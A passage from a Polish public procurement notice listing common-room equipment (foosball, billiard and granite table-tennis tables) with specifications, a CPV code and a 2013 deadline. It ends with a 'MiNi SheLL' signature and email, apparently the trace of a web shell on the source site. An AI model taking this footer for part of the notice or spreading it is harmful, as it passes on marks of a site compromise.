-	wymiary minimalne:130 x 70 x 80 cm 
-	płyty boczne: płyta MDF, grubość minimalna: 14 mm, szerokość: 30-40 cm  
-	drążki zawodników: chromowana stal 
-	łożyska kulkowe 
-	stopki poziomujące 
Ilość zamawianych sztuk:1
3.	Wyposażenie świetlicy - stół bilardowy wraz z niezbędnymi akcesoriami
Dane techniczne:
-blat wykonany z płyty kamiennej jednolitej,
-wymiary: pole gry: 127x254cm,
-możliwość regulacji poziomu,
Wyposażenie: kije (min.6), bile (komplet do pool-a), kreda, podpórka, trójkąt, końcówki (10 sztuk)
Ilość zamawianych sztuk:1
4. Wyposażenie świetlicy  - stół do tenisa  kamienny granitowy 
Wymiary[m]: dł. 2,8; szer. 1,5; wys. 0,80; strefa bezpieczeństwa 5,5x8,8; 
liczba użytkowników 4. Zamówienie obejmuje również montaż sprzętu sportowego.
      Dane techniczne:
-	blat stołu szlifowany, zaimpregnowany specjalnym lakierem,
- siatka stalowa, ocynkowana ogniowo,
-	całość wsparta na konstrukcji stalowo-betonowej.
      Ilość zamawianych sztuk:1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com